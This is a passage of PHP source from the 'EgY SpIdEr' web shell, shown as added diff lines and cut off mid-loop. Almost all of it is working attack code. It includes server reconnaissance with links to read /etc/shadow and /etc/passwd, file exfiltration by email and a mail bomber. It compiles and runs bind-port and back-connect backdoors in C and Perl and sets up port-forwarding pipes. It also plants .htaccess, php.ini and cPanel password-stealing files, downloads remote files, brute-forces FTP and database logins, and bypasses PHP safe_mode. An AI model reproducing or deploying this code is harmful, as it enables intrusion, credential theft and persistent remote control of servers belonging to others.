"</b>".ws(2); +echo "Open_Basedir: <b>"; +if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};} +else {echo "<font color=green>NONE</font></b>";} +echo ws(2)."Safe_Exec_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Gid: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Include_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Sql.safe_mode: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} + +echo "<br>".ws(2); +echo "Disable Functions : <b>";$df='ini_get disable!'; +if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} + +if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);} +elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';} +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."Free Space : <b>".view_size($free)."</b> Total Space: <b>".view_size($all)."</b>"; + + +if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";}; + +if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";}; + +if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";}; + + +echo "<br>".ws(2)."</b>"; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?' title=\"".$lang[$language.'_text160']."\"><b>Home</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?egy' title=\"".$lang[$language.'_text159']."\"><b>About EgY SpIdEr</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?news' title=\"".$lang[$language.'_text152']."\"><b>News</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?logout=1' title=\"".$lang[$language.'_text153']."\"><b>Logout</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=feedback' title=\"".$lang[$language.'_text180']."\"><b>Feedback & Contact Me </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=qindx' title=\"".$lang[$language.'_text154']."\"><b>Quick index </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=massbrowsersploit' title=\"".$lang[$language.'_text155']."\"><b>Mass Code Injection</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=showsrc' title=\"".$lang[$language.'_text156']."\"><b>File source </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=zone' title=\"".$lang[$language.'_text157']."\"><b>Zone-h</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=encoder' title=\"".$lang[$language.'_text158']."\"><b>Hash Tools</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>PhpInfo</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>Php.Ini</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>Cpu</b></a> ".$rb; +if(!$unix) { + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>SystemInfo</b></a> ".$rb; +}else{ + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>Syslog</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>Resolv</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>Hosts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>Shadow</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>Passwd</b></a> ".$rb; +} +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>Tmp</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>Delete</b></a> ".$rb; + +if($unix && !$safe_mode) +{ + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>Procinfo</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>Version</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>Free</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>Dmesg</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>Vmstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>Interrupts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>Realise1</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>Realise2</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb; + + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>W</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>Who</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>Uptime</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>Last</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>Ps Aux</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>Service</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>Ifconfig</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>Netstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>Fstab</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>Fdisk</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb; +} + +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; + +if($unix){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if($file=moreread($_POST['loc_file'])){ $filedump = $file; } + else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + $filename = @basename($_POST['loc_file']); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from egy spider shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'egy_spider@hotmail.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) + { + for($h=1;$h<=$_POST['mail_flood'];$h++){ + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n"); + } + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(@mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="touch") +{ +if(!$_POST['file_name_r']) + { + $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; + $datar = @strtotime($datar); + @touch($_POST['file_name'],$datar,$datar);} +else{ + @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r'])); +} +$_POST['cmd']=""; +} + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; } + elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; } + elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } + elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };} + else { err(1,$_POST['e_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars($filedump); + echo "</textarea>"; + echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>"; + echo "<input type=hidden name=dir value='".$dir."'>"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + morewrite($_POST['e_name'],$_POST['e_text']); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + @touch($_POST['e_name'],$mtime,$mtime); + } + + +if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'prxpl',$prx_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &'); + @unlink($tempdir.'prxpl'); + $_POST['cmd']="ps -aux | grep prxpl"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf($tempdir.'bd.c',$port_bind_bd_c); + $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c'); + @unlink($tempdir.'bd.c'); + $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); + @unlink($tempdir.'bd'); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'bdpl',$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &'); + @unlink($tempdir.'bdpl'); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'back',$back_connect); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'back.c',$back_connect_c); + $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c'); + @unlink($tempdir.'back.c'); + $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'dp',$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); + @unlink($tempdir.'dp'); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'dpc.c',$datapipe_c); + $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c'); + @unlink($tempdir.'dpc.c'); + $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); + @unlink($tempdir.'dpc'); + $_POST['cmd']="ps -aux | grep dpc"; +} + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + +for($upl=0;$upl<=16;$upl++) +{ + if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ + if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; } + else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; } + @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>"); + } +} +if (!empty($_POST['port1'])) +{ + cf("bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + $blah = ex("./bds ".$_POST['port1']." &"); + $_POST['cmd']="echo \"Now script install backdoor connect to port "; + }else{ +cf("/tmp/bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + } +if (!empty($_POST['php_ini1'])) +{ + cf("php.ini",$egy_ini); + $_POST['cmd']=" now make incloude for file ini.php and add ss and your shell"; + } + + if (!empty($_POST['htacces'])) +{ + cf(".htaccess",$htacces); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_res'])) +{ + cf(".ini.php",$egy_res); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_ini'])) +{ + cf("ini.php",$egy_ini); + + + $_POST['cmd']=" http://target.com/ini.php?egy=http://shell.txt? add ss ini.php now make incloude for file ini.php and add egy and your shell"; + } + + if (!empty($_POST['egy_cp'])) +{ + cf("pass_cpanel.php",$egy_cp); + $_POST['cmd']="cpanel add"; + } + + if (!empty($_POST['egy_vb'])) +{ + cf("vb_hacker.php",$egy_vb); + $_POST['cmd']="Added Following Files .htaccess & ini.php & vb_hacker.php & pass_cpanel.php "; + } + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + +for($upl=0;$upl<=16;$upl++) +{ + +} + +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case 'fopen': + $datafile = @implode("", @file($_POST['rem_file'])); + if($datafile) + { + if(!morewrite($_POST['loc_file'],$datafile)){ err(0);}; + } + + $_POST['cmd'] = ''; + break; + case 'wget': + $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\""; + break; + case 'fetch': + $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + case 'lynx': + $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'links': + $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'GET': + $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'curl': + $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + } +} +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down"))) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);} + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);} + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } + +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute"))) + { + if($_POST['cmd']=="ftp_brute"){ + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + }else if($_POST['cmd']=="db_brute"){ + $connection = 1; + } + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);} + } + +echo $table_up3; +if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +{ + switch($_POST['cmd']) + { + case 'safe_dir': + + if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + foreach ($d as $file) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + } + + elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + + elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=@readdir($d))) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + @closedir($d); + } + + elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath']))) + { + echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n"; + function eh($errno, $errstr, $errfile, $errline) + { + global $D, $c, $i; + preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); + if($o){ $D[$c] = $o[2]; $c++;} + } + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_WARNING); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $root = "/"; + if($dir) $root = $dir; + $c = 0; $D = array(); + @set_error_handler("eh"); + $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; + for($i=0; $i < strlen($chars); $i++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; + $prevD = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD) + { + for($j=0; $j < strlen($chars); $j++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; + $prevD2 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD2) + { + for($p=0; $p < strlen($chars); $p++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; + $prevD3 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD3) + { + for($r=0; $r < strlen($chars); $r++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; + @glob($path."*"); + } + } + } + } + } + } + } + $D = array_unique($D); + foreach($D as $item) echo "{$item}\r\n"; + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n"; + error_reporting($error_reporting); + } + elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath']))) + { + echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n"; + if(!$dir){$dir='/etc/';}; + if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';} + if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';} + + if($realpath=realpath($dir.'/')){echo $realpath."\r\n";} + if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";} + foreach($presets_rlph as $preset_rlph){ + if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";} + } + for($i=0; $i < 